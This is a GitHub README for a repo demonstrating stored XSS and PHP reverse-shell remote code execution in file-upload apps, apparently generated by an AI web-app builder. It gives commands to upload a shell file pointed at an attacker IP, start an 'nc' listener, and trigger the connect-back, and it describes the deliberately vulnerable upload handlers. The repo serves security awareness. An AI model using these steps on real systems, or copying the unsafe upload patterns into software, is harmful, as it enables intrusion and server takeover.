GitHub - Lillevang/bolt-pwn
bolt-pwn 🔥

XSS and Reverse Shell vulnerabilities in AI-generated webapps

Earlier this week I tested bolt.new, an AI tool for generating fullstack web apps in the browser.
It's fast, flashy… and dangerously naive when it comes to security.

This repo contains two projects I asked it to generate — both with serious vulnerabilities.


💣 What’s Inside

/node/ — Stored XSS

A Node.js + EJS file upload utility generated by Bolt.
Vulnerability: accepts .html uploads and serves them straight back from /uploads/ with no sanitization, so the browser renders the file as a page in the app's own origin and any script inside it runs (stored XSS).

🧪 Run the server:

cd node && npm install && npm run dev

🧪 Payload: xss.html — upload this file
🔗 Visit /uploads/<filename> in your browser to trigger the script and verify that the JavaScript executes.


/php/ — Reverse Shell (RCE)

A PHP file upload handler that:

  • Accepts all file types
  • Uses original filenames
  • Serves uploads from a public directory

🧪 Run the server:

cd php && php -S localhost:8080

🧪 Payload: shell.php — edit it to point at your listener (your private IP or attacker IP, and the port the listener will use), then upload it:

curl -F 'file=@shell.php' http://localhost:8080/api/upload.php

💥 Start the listener first, then visit /uploads/shell.php: the PHP built-in server executes the uploaded file and it connects back to you.

nc -lvnp 4444

⚠️ Disclaimer

This repo is for educational and awareness purposes only. Please don’t deploy this as-is, and don’t use these techniques unethically.


🧠 Takeaway

AI tools can build working software in seconds — but they don’t think like attackers. You still need to review the code, validate inputs, and secure your apps.


📎 Related Post

Read the background and see the screenshots on my website or in the original LinkedIn post.

More blog content coming soon.
